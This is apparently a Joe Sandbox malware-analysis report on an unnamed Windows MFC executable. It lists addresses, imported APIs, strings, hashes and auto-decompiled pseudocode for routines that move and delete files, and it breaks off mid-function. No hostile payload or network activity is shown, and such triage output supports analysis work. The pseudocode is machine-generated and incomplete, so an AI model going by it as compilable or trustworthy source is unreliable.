0x0042a01b
0x0042a01f
0x0042a023
0x0042a026
0x0042a029
0x0042a02e
0x0042a035
0x0042a038
0x0042a03b
0x0042a03e
0x0042a041
0x0042a047
0x0042a048
0x0042a049
0x0042a04c
0x0042a050
0x0042a057
0x0042a439
0x0042a43c
0x0042a440
0x0042a445
0x0042a448
0x0042a44c
0x0042a44f
0x0042a454
0x0042a45b
0x0042a462
0x0042a46e
0x0042a477
0x0042a477
0x0042a060
0x0042a067
0x00000000
0x00000000
0x0042a070
0x0042a075
0x0042a07b
0x0042a07c
0x0042a080
0x0042a087
0x0042a198
0x0042a19b
0x0042a1aa
0x0042a1b9
0x0042a1c4
0x0042a1cd
0x0042a1d8
0x0042a1d9
0x0042a1e0
0x0042a1e7
0x0042a1ee
0x0042a1f5
0x0042a1fd
0x0042a201
0x0042a212
0x0042a213
0x0042a214
0x0042a21f
0x0042a223
0x0042a224
0x0042a22c
0x0042a230
0x0042a23b
0x0042a244
0x0042a24d
0x0042a250
0x0042a3b9
0x0042a3bc
0x0042a3c8
0x0042a400
0x0042a408
0x0042a40c
0x0042a414
0x0042a418
0x0042a420
0x0042a424
0x0042a429
0x0042a430
0x0042a432
0x0042a436
0x0042a3ca
0x0042a3ca
0x0042a3d2
0x0042a3d6
0x0042a3de
0x0042a3e2
0x0042a3ea
0x0042a3ee
0x0042a3f3
0x0042a3fa
0x0042a3fa
0x00000000
0x0042a3c8
0x0042a256
0x0042a259
0x0042a25f
0x0042a265
0x0042a26d
0x0042a272
0x0042a27b
0x0042a27e
0x0042a281
0x0042a291
0x0042a29a
0x0042a29c
0x0042a2a5
0x0042a2a8
0x0042a2ab
0x0042a2bb
0x0042a2bd
0x0042a2c2
0x0042a2c4
0x0042a2c6
0x0042a2cc
0x0042a2d0
0x0042a2d1
0x0042a2d6
0x0042a2d9
0x0042a2dd
0x0042a2e1
0x0042a2e6
0x0042a2e9
0x0042a2ed
0x0042a2ed
0x0042a2c4
0x0042a2f8
0x0042a331
0x0042a2fa
0x0042a309
0x0042a30e
0x0042a312
0x0042a317
0x0042a318
0x0042a31d
0x0042a323
0x0042a327
0x0042a327
0x0042a341
0x0042a36e
0x0042a372
0x0042a373
0x0042a376
0x0042a377
0x0042a37f
0x0042a380
0x0042a384
0x0042a38c
0x0042a390
0x0042a35d
0x0042a363
0x0042a364
0x0042a364
0x0042a39e
0x0042a3a2
0x0042a3a5
0x0042a3ad
0x0042a3b1
0x0042a3b2
0x0042a3b2
0x00000000
0x0042a08d
0x0042a093
0x0042a093
0x0042a099
0x00000000
0x00000000
0x0042a0ac
0x0042a0b5
0x0042a0bb
0x0042a0be
0x0042a0c2
0x0042a0c9
0x00000000
0x00000000
0x0042a0de
0x0042a0e7
0x0042a0f3
0x0042a0fc
0x0042a0fe
0x0042a104
0x0042a10a
0x0042a10a
0x0042a106
0x0042a106
0x0042a106
0x0042a111
0x0042a117
0x0042a11a
0x0042a11e
0x0042a123
0x0042a125
0x0042a12a
0x0042a12a
0x0042a12f
0x0042a137
0x0042a145
0x0042a14e
0x0042a156
0x0042a156
0x0042a16a
0x0042a170
0x0042a173
0x0042a17f
0x0042a17f
0x0042a184
0x0042a184
0x0042a18a
0x0042a18b
0x0042a190
0x00000000
0x0042a093

APIs

__EH_prolog.LIBCMT ref: 00429FDF
#533.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 00429FF4
#350.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 0042A001
#540.MFC42(?,00000001,00000000,0042A4E3,?,00000001,?,?,00000000), ref: 0042A00D
#860.MFC42(00000000,?,00000001,00000000,0042A4E3), ref: 0042A029
#5194.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A050
#3318.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A060
#540.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A070
#5465.MFC42(?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A080
lstrcpynA.KERNEL32(?,?,00000FFF,?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A0AC
#5465.MFC42(?,?,00000001,00000000,0042A4E3), ref: 0042A0C2
lstrcpynA.KERNEL32(?,?,000007FF,?,?,00000001,00000000,0042A4E3), ref: 0042A0DE

Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653

#539.MFC42(?,?,?,00000001,00000000,0042A4E3), ref: 0042A137
lstrcpyA.KERNEL32(?,00000000,?,?,?,00000001,00000000,0042A4E3), ref: 0042A145
#800.MFC42(?,00000001,00000000,0042A4E3), ref: 0042A14E
SysFreeString.OLEAUT32(?), ref: 0042A156
#5465.MFC42(?,?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A18B
#1997.MFC42(?,?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A19B
memset.MSVCRT ref: 0042A1AA
memset.MSVCRT ref: 0042A1B9
#540.MFC42 ref: 0042A1F5
#540.MFC42 ref: 0042A201
memset.MSVCRT ref: 0042A224
#6673.MFC42(?), ref: 0042A265
#2614.MFC42(?), ref: 0042A26D
#548.MFC42(?,000000FF,?,?), ref: 0042A281
#548.MFC42(?,000000FF,?,?,?,000000FF,?,?), ref: 0042A2AB
#858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A2E1
#800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A2ED
#2818.MFC42(?,<H1> %s</H1>,00000000,?,?,000000FF,?,?), ref: 0042A318
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0042A327
#2614.MFC42(?,?,000000FF,?,?), ref: 0042A331
#939.MFC42(00000001,?,?,000000FF,?,?), ref: 0042A364
#922.MFC42(00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A377
#939.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A384
#800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A390
#800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3CA
#800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3D6
#800.MFC42(00000000,00000000,?,00000001,?,?,000000FF,?,?), ref: 0042A3E2
#800.MFC42 ref: 0042A400
#800.MFC42 ref: 0042A40C
#800.MFC42 ref: 0042A418
#800.MFC42(?,00000000,00000001,00000000,?,00000001,00000000,0042A4E3), ref: 0042A44F
#798.MFC42(?,00000000,00000001,00000000), ref: 0042A462

Strings

;, xrefs: 0042A23B
|TD, xrefs: 0042A45B
<H1> %s</H1>, xrefs: 0042A312
;, xrefs: 0042A244

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#540$#5465memset$#2614#548#939H_prologlstrcpyn$#1997#2818#3318#350#5194#533#539#6673#798#823#858#860#922FreeStringlstrcpy
String ID: ;$;$<H1> %s</H1>$|TD
API String ID: 1136394844-2946028977
Opcode ID: 6b138614185374d8f5a59568fe9b2a81f14a8e52516fe617daeb1eba522b116f
Instruction ID: 647c27339a496d4ec5a2929266941c097d32bc3c000974a514577c5eb7e8b247
Opcode Fuzzy Hash: 6b138614185374d8f5a59568fe9b2a81f14a8e52516fe617daeb1eba522b116f
Instruction Fuzzy Hash: 4EE17371D0025DDBDF11EFE5D885AEEB7B8AF18308F50405EE405A7282DB785B49CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00424065, Relevance: 79.0, APIs: 42, Strings: 3, Instructions: 282
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00424065(CHAR* __ebx, void* __edx, void* __esi) {
				char _t150;
				intOrPtr* _t159;
				void* _t163;
				intOrPtr _t169;
				void* _t170;
				void* _t175;
				void* _t178;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				void* _t191;
				void* _t199;
				CHAR* _t201;
				signed int _t203;
				void* _t237;
				void* _t265;
				void* _t266;
				void* _t268;

				_t265 = __esi;
				_t260 = __edx;
				_t201 = __ebx;
				 *(_t268 + 8) =  &(( *(_t268 + 8))[ *((intOrPtr*)(_t268 - 0x54))]);
				if( *((intOrPtr*)(__esi + 0x14e)) != __ebx) {
					E00418858(__edx,  *((intOrPtr*)(_t268 - 0x18)));
					_push(_t268 - 0x38);
					L004112B7(_t268 - 0x38, __ebx, _t268 - 0xe0, __edx, __esi);
					_push(_t268 - 0xe0);
					L00412218(_t268 - 0xe0, __ebx, _t268 - 0x1cc, __edx, __esi);
					_t199 = _t268 - 0x34c;
					_push(_t199);
					_push( *(_t268 - 0x38));
					L0043E294();
					if(_t199 != 0) {
						 *(_t268 + 8) =  &(( *(_t268 + 8))[ *((intOrPtr*)(_t268 - 0x340))]);
					}
					if( *(_t268 - 0x14) == _t201) {
						 *(_t268 + 8) = _t201;
					}
				}
				if( *((intOrPtr*)(_t265 + 0x134)) != _t201 &&  *(_t268 + 8) >> 0xa <  *((intOrPtr*)(_t265 + 0x10c))) {
					 *(_t268 + 8) = _t201;
				}
				_t150 =  *0x4550cc; // 0x0
				 *((char*)(_t268 - 0x4cc)) = _t150;
				_t203 = 0x1f;
				memset(_t268 - 0x4cb, 0, _t203 << 2);
				asm("stosw");
				asm("stosb");
				E0042A943(_t268 - 0x4cc);
				L0043DDD8();
				 *(_t268 - 4) = 0x21;
				asm("sbb eax, eax");
				_t159 = E00429029(_t268 - 0x1c,  ~( *(_t265 + 0x135)) + 0xe016);
				_push(_t268 - 0x44c);
				_push(_t268 - 0x4cc);
				_push(_t268 - 0x3cc);
				_push( *_t159);
				 *(_t268 - 4) = 0x22;
				_push(_t268 - 0x4c);
				L0043E174();
				 *(_t268 - 4) = 0x21;
				L0043DD36();
				_push(_t268 - 0x4c);
				L004128F9(_t268 - 0x4c, _t201, _t268 - 0x1cc, _t260, _t265);
				if( *(_t268 + 8) == _t201) {
					L15:
					if( *((intOrPtr*)(_t265 + 0x132)) != _t201) {
						 *(_t268 - 0x10) = _t201;
						if( *((intOrPtr*)(_t268 - 0x60)) >= _t201) {
							do {
								_t169 =  *((intOrPtr*)(_t268 - 0x64));
								_push( *((intOrPtr*)(_t169 +  *(_t268 - 0x10) * 4)));
								L0043DE26();
								_push(0x2e);
								 *(_t268 - 4) = 0x28;
								L0043DFB8();
								_push(_t169);
								_t170 = _t268 - 0x1c;
								_push(_t170);
								L0043DFD0();
								_push(_t170);
								 *(_t268 - 4) = 0x29;
								L0043DFCA();
								 *(_t268 - 4) = 0x28;
								L0043DD36();
								MoveFileA( *( *((intOrPtr*)(_t268 - 0x64)) +  *(_t268 - 0x10) * 4),  *(_t268 + 8));
								 *(_t268 - 4) = 0x21;
								L0043DD36();
								 *(_t268 - 0x10) =  *(_t268 - 0x10) + 1;
							} while ( *(_t268 - 0x10) <=  *((intOrPtr*)(_t268 - 0x60)));
						}
					}
				} else {
					_t175 = _t268 - 0x1cc;
					_push(_t175);
					L00412FF7(_t175, _t201, _t268 - 0xfc, _t260, _t265);
					_t282 = _t175;
					if(_t175 == 0) {
						goto L15;
					} else {
						_push("pk.bin");
						 *((intOrPtr*)(_t265 + 0x118)) =  *((intOrPtr*)(_t268 - 0x6c));
						_push(0x4558c8);
						_push(_t268 + 8);
						L0043DE20();
						 *(_t268 - 4) = 0x23;
						_t178 = E0040BC5C(_t265, _t282,  *(_t268 + 8));
						_t237 = _t268 + 8;
						 *(_t268 - 4) = 0x21;
						L0043DD36();
						if( *((intOrPtr*)(_t265 + 0x110)) == _t201) {
							goto L15;
						} else {
							E004254F6(L004044C9(E004207A5(L004044C9(_t178, _t237, _t265) + 0x78), L004044C9(_t178, _t237, _t265) + 0x78, _t265));
							DeleteFileA( *(_t268 - 0x24));
							if( *((intOrPtr*)(_t265 + 0x132)) != _t201) {
								 *(_t268 - 0x14) = _t201;
								if( *((intOrPtr*)(_t268 - 0x60)) >= _t201) {
									do {
										DeleteFileA( *( *((intOrPtr*)(_t268 - 0x64)) +  *(_t268 - 0x14) * 4));
										_t186 =  *((intOrPtr*)(_t268 - 0x64));
										_push( *((intOrPtr*)(_t186 +  *(_t268 - 0x14) * 4)));
										L0043DE26();
										_push(0x5c);
										 *(_t268 - 4) = 0x24;
										L0043DFB8();
										_push(_t186 + 1);
										_t188 = _t268 + 8;
										_push(_t188);
										L0043DFD0();
										_push("th_");
										 *(_t268 - 4) = 0x25;
										L0043E0CC();
										_push(0x5c);
										L0043DFB8();
										_push(_t188 + 1);
										_t190 = _t268 - 0x1c;
										_push(_t190);
										L0043DFB2();
										_push(_t190);
										 *(_t268 - 4) = 0x26;
										L0043DE1A();
										 *(_t268 - 4) = 0x25;
										L0043DD36();
										_push(0x2e);
										L0043DFB8();
										_push(_t190);
										_t191 = _t268 - 0x40;
										_push(_t191);
										L0043DFD0();
										_push(_t191);
										 *(_t268 - 4) = 0x27;
										L0043DFCA();
										 *(_t268 - 4) = 0x25;
										L0043DD36();
										DeleteFileA( *(_t268 + 8));
										 *(_t268 - 4) = 0x24;
										L0043DD36();
										 *(_t268 - 4) = 0x21;
										L0043DD36();
										 *(_t268 - 0x14) =  *(_t268 - 0x14) + 1;
									} while ( *(_t268 - 0x14) <=  *((intOrPtr*)(_t268 - 0x60)));
								}
								goto L15;
							}
						}
					}
				}
				if( *(_t265 + 0x135) != _t201) {
					DeleteFileA( *(_t268 - 0x2c));
					DeleteFileA( *(_t268 - 0x34));
					DeleteFileA( *(_t268 - 0x3c));
				}
				if( *((intOrPtr*)(_t265 + 0x14e)) != _t201) {
					DeleteFileA( *(_t268 - 0x38));
				}
				 *0x455900 = _t201;
				 *(_t268 - 4) = 0x1e;
				L0043DD36();
				 *(_t268 - 4) = 0x1c;
				_t163 = E0042839B(_t268 - 0x68);
				 *(_t268 - 4) = 0x1b;
				L0043DD36();
				 *(_t268 - 4) = 7;
				L004110CC(_t163, _t201, _t268 - 0xe0, _t260, _t265);
				 *(_t268 - 4) = 6;
				L00411F64(_t163, _t201, _t268 - 0x1cc, _t260, _t265);
				_t266 = 1;
				 *(_t268 - 4) = 5;
				L00412C30(_t163, _t201, _t268 - 0xfc, _t260, _t266);
				 *(_t268 - 4) = 4;
				L0043DD36();
				 *(_t268 - 4) = 3;
				L0043DD36();
				 *(_t268 - 4) = 2;
				L0043DD36();
				 *(_t268 - 4) = 1;
				L0043DD36();
				 *(_t268 - 4) = _t201;
				L0043DD36();
				 *(_t268 - 4) =  *(_t268 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t268 - 0xc));
				return _t266;
			}

0x00424065
0x00424065
0x00424065
0x00424068
0x00424071
0x00424076
0x0042407f
0x00424086
0x00424097
0x00424098
0x0042409d
0x004240a3
0x004240a4
0x004240a7
0x004240ae
0x004240b6
0x004240b6
0x004240bc
0x004240be
0x004240be
0x004240bc
0x004240c7
0x004240d7
0x004240d7
0x004240da
0x004240e1
0x004240e7
0x004240f0
0x004240f2
0x004240f4
0x004240fc
0x00424105
0x00424110
0x00424116
0x00424122
0x00424131
0x00424138
0x0042413f
0x00424140
0x00424144
0x00424148
0x00424149
0x00424154
0x00424158
0x00424166
0x00424167
0x00424175
0x004242e4
0x004242ea
0x004242ef
0x004242f2
0x004242f4
0x004242f4
0x004242fa
0x00424300
0x00424305
0x0042430a
0x0042430e
0x00424313
0x00424314
0x00424317
0x0042431b
0x00424320
0x00424324
0x00424328
0x00424330
0x00424334
0x00424346
0x0042434f
0x00424353
0x00424358
0x0042435e
0x004242f4
0x004242f2
0x0042417b
0x0042417b
0x00424187
0x00424188
0x0042418d
0x0042418f
0x00000000
0x00424195
0x00424198
0x0042419d
0x004241a6
0x004241ab
0x004241ac
0x004241b5
0x004241b9
0x004241be
0x004241c1
0x004241c5
0x004241d0
0x00000000
0x004241d6
0x004241ec
0x004241f4
0x004241fc
0x00424205
0x00424208
0x0042420e
0x00424217
0x00424219
0x0042421f
0x00424225
0x0042422a
0x0042422f
0x00424233
0x0042423c
0x0042423d
0x00424240
0x00424241
0x00424246
0x0042424e
0x00424252
0x00424257
0x0042425c
0x00424265
0x00424266
0x00424269
0x0042426a
0x0042426f
0x00424273
0x00424277
0x0042427f
0x00424283
0x00424288
0x0042428d
0x00424292
0x00424293
0x00424296
0x0042429a
0x0042429f
0x004242a3
0x004242a7
0x004242af
0x004242b3
0x004242bb
0x004242c0
0x004242c4
0x004242cc
0x004242d0
0x004242d5
0x004242db
0x0042420e
0x00000000
0x00424208
0x004241fc
0x004241d0
0x0042418f
0x00424369
0x0042436e
0x00424373
0x00424378
0x00424378
0x00424380
0x00424385
0x00424385
0x0042438a
0x00424390
0x00424394
0x0042439c
0x004243a0
0x004243a8
0x004243ac
0x004243b7
0x004243bb
0x004243c6
0x004243ca
0x004243d1
0x004243d8
0x004243dc
0x004243e4
0x004243e8
0x004243f0
0x004243f4
0x004243fc
0x00424400
0x00424408
0x0042440c
0x00424414
0x00424417
0x0042441c
0x00424423
0x00424430
0x00424438

APIs

#3790.MFC42(?,?), ref: 004240A7
#540.MFC42(?,?), ref: 00424105
#2818.MFC42(?,?,?,?,?), ref: 00424149
#800.MFC42 ref: 00424158
#924.MFC42(?,004558C8,pk.bin), ref: 004241AC
#800.MFC42(?,004558C8,pk.bin), ref: 004241C5
DeleteFileA.KERNEL32(?), ref: 004241F4
DeleteFileA.KERNEL32(?), ref: 00424217
#537.MFC42(?), ref: 00424225
#5683.MFC42(0000005C,?), ref: 00424233
#4129.MFC42(?,00000001,0000005C,?), ref: 00424241
#941.MFC42(th_,?,00000001,0000005C,?), ref: 00424252
#5683.MFC42(0000005C,th_,?,00000001,0000005C,?), ref: 0042425C
#4277.MFC42(?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042426A
#939.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424277
#800.MFC42(00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 00424283
#5683.MFC42(0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042428D
#4129.MFC42(?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 0042429A
#858.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242A7
#800.MFC42(00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242B3
DeleteFileA.KERNEL32(?,00000000,?,00000000,0000002E,00000000,?,00000001,0000005C,th_,?,00000001,0000005C,?), ref: 004242BB
#800.MFC42 ref: 004242C4
#800.MFC42 ref: 004242D0
#537.MFC42(?), ref: 00424300
#5683.MFC42(0000002E,?), ref: 0042430E
#4129.MFC42(?,00000000,0000002E,?), ref: 0042431B
#858.MFC42(00000000,?,00000000,0000002E,?), ref: 00424328
#800.MFC42(00000000,?,00000000,0000002E,?), ref: 00424334
MoveFileA.KERNEL32 ref: 00424346
#800.MFC42 ref: 00424353
DeleteFileA.KERNEL32(?), ref: 0042436E
DeleteFileA.KERNEL32(?), ref: 00424373
DeleteFileA.KERNEL32(?), ref: 00424378
DeleteFileA.KERNEL32(?), ref: 00424385
#800.MFC42 ref: 00424394
#800.MFC42 ref: 004243AC
#800.MFC42 ref: 004243E8
#800.MFC42 ref: 004243F4
#800.MFC42 ref: 00424400
#800.MFC42 ref: 0042440C
#800.MFC42 ref: 00424417
#800.MFC42 ref: 00424423

Strings

th_, xrefs: 00424246
!, xrefs: 0042434F
pk.bin, xrefs: 00424198

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$File$Delete$#5683$#4129$#537#858$#2818#3790#4277#540#924#939#941Move
String ID: !$pk.bin$th_
API String ID: 882306589-890230901
Opcode ID: 6782d8b2abdae28853ce5e7ff0a4a3a8019d2610ba2753e283fbf466a4933a91
Instruction ID: 8259b65b6b2bcebda76eddce74b94cf01f81ea2d90028f77b2b8d49171ab9716
Opcode Fuzzy Hash: 6782d8b2abdae28853ce5e7ff0a4a3a8019d2610ba2753e283fbf466a4933a91
Instruction Fuzzy Hash: D8C1D431D0128DEECF15EFE1D895AEDBBB4AF19304F00449EE40667282DB786B48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004223D1, Relevance: 74.0, APIs: 38, Strings: 4, Instructions: 488
timeclipboardCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004223D1(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t196;
				intOrPtr* _t213;
				intOrPtr* _t218;
				intOrPtr* _t223;
				intOrPtr* _t228;
				intOrPtr* _t233;
				intOrPtr* _t238;
				intOrPtr* _t243;
				intOrPtr* _t248;
				void* _t251;
				void* _t252;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t259;
				intOrPtr* _t277;
				intOrPtr* _t278;
				intOrPtr* _t279;
				char _t303;
				intOrPtr _t313;
				void* _t314;
				CHAR** _t379;
				void* _t380;
				intOrPtr _t382;
				signed int _t392;
				void* _t393;
				_Unknown_base(*)()* _t396;
				void* _t400;
				void* _t402;
				void* _t404;
				intOrPtr _t406;
				void* _t415;

				_t393 = __edx;
				_t314 = __ecx;
				E0043E4E0(0x442476, _t402);
				_t196 = E0043E690(0x1978, __ecx);
				_t400 = _t314;
				_t409 =  *(_t400 + 0x2744);
				if( *(_t400 + 0x2744) != 0) {
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t402 - 0xc));
					return _t196;
				}
				_t396 = 0;
				_push(0);
				E0040D26E(_t402 - 0x890, _t409);
				_push(0);
				 *(_t402 - 4) = 0;
				E00418E5D(_t402 - 0x3c4);
				_push(0);
				 *(_t402 - 4) = 1;
				E0042AF2E(_t402 - 0xac4);
				_push(0);
				 *(_t402 - 4) = 2;
				E00419770(_t402 - 0xe18);
				_push(0);
				 *(_t402 - 4) = 3;
				E0041AA04(_t402 - 0x1984);
				_push(0);
				 *(_t402 - 4) = 4;
				L0042C4A8(_t402 - 0xc60);
				_push(0);
				 *(_t402 - 4) = 5;
				L0040676C(_t402 - 0x1478);
				_push(0);
				 *(_t402 - 4) = 6;
				E00403ED5(_t402 - 0x1080);
				 *(_t402 - 4) = 7;
				E0040B74B(_t402 - 0x84, 0);
				_t313 = _t400 + 0x16b8;
				 *(_t402 - 4) = 8;
				 *((intOrPtr*)(_t402 - 0x360)) = _t313;
				memcpy(_t402 - 0x35c, _t400 + 0x17cc, 4);
				 *((intOrPtr*)(_t402 - 0xa5c)) = _t400 + 0x3e8;
				 *((intOrPtr*)(_t402 - 0xa58)) = _t400 + 0x89c;
				 *((intOrPtr*)(_t402 - 0xe5c)) = _t400 + 0x1204;
				 *((intOrPtr*)(_t402 - 0xdb4)) = _t313;
				 *((intOrPtr*)(_t402 - 0x1920)) = _t313;
				 *((intOrPtr*)(_t402 - 0x1084)) = _t313;
				 *((intOrPtr*)(_t402 - 0xbfc)) = _t313;
				 *((intOrPtr*)(_t402 - 0x101c)) = _t313;
				 *((intOrPtr*)(_t402 - 0xa60)) = _t313;
				 *((intOrPtr*)(_t402 - 0x20)) = _t313;
				_t213 = E00429029(_t402 - 0x10, 0xe001);
				_t406 = _t404 + 0x14;
				_push(0);
				_push( *_t213);
				_push(_t402 - 0x3c4);
				 *(_t402 - 4) = 9;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t218 = E00429029(_t402 - 0x10, 0xe05b);
				_push(0);
				_push( *_t218);
				_push(_t402 - 0xe18);
				 *(_t402 - 4) = 0xa;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t223 = E00429029(_t402 - 0x10, 0xe02a);
				_push(0);
				_push( *_t223);
				_push(_t402 - 0xc60);
				 *(_t402 - 4) = 0xb;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t228 = E00429029(_t402 - 0x10, 0xe021);
				_push(0);
				_push( *_t228);
				_push(_t402 - 0x1984);
				 *(_t402 - 4) = 0xc;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t233 = E00429029(_t402 - 0x10, 0xe039);
				_push(0);
				_push( *_t233);
				_push(_t402 - 0x1478);
				 *(_t402 - 4) = 0xd;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t238 = E00429029(_t402 - 0x10, 0xe057);
				_push(0);
				_push( *_t238);
				_push(_t402 - 0x1080);
				 *(_t402 - 4) = 0xe;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t243 = E00429029(_t402 - 0x10, 0xe00c);
				_push(0);
				_push( *_t243);
				_push(_t402 - 0xac4);
				 *(_t402 - 4) = 0xf;
				E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t248 = E00429029(_t402 - 0x10, 0xe03c);
				_push(0);
				_push( *_t248);
				_push(_t402 - 0x84);
				 *(_t402 - 4) = 0x10;
				_t251 = E0040D958(_t402 - 0x890);
				 *(_t402 - 4) = 8;
				L0043DD36();
				_t252 = E00422AF4(_t251);
				_push(_t402 - 0x10);
				 *((intOrPtr*)(_t402 - 0x14)) = _t406;
				_push( *((intOrPtr*)(_t252 + 0x7c)));
				L0043DE26();
				E00422B68(_t402 - 0x890);
				 *((intOrPtr*)(_t402 - 0x10)) = E00429029(_t402 - 0x14, 0xe01c);
				 *(_t402 - 4) = 0x11;
				_t256 = E00422AF4(_t255);
				_push( *((intOrPtr*)(_t256 + 0x7c)));
				L0043DE26();
				_push(_t402 - 0x1c);
				 *(_t402 - 4) = 0x12;
				 *((intOrPtr*)(_t402 - 0x18)) = _t406;
				_push( *((intOrPtr*)(_t402 - 0x10)));
				_push(_t256);
				_push(_t406);
				L0043E282();
				_t257 = E00422B31(_t402 - 0x890);
				 *(_t402 - 4) = 0x11;
				L0043DD36();
				 *(_t402 - 4) = 8;
				L0043DD36();
				 *(_t400 + 0x2744) = 1;
				_t258 = E004221C8(_t257, _t400, 1);
				L0043DE7A();
				 *(_t400 + 0x2744) =  *(_t400 + 0x2744) & 0x00000000;
				if(_t258 != 1) {
					L44:
					_push(1);
					_t259 = E00422006(_t400);
					if( *((intOrPtr*)(_t400 + 0x2728)) == _t396) {
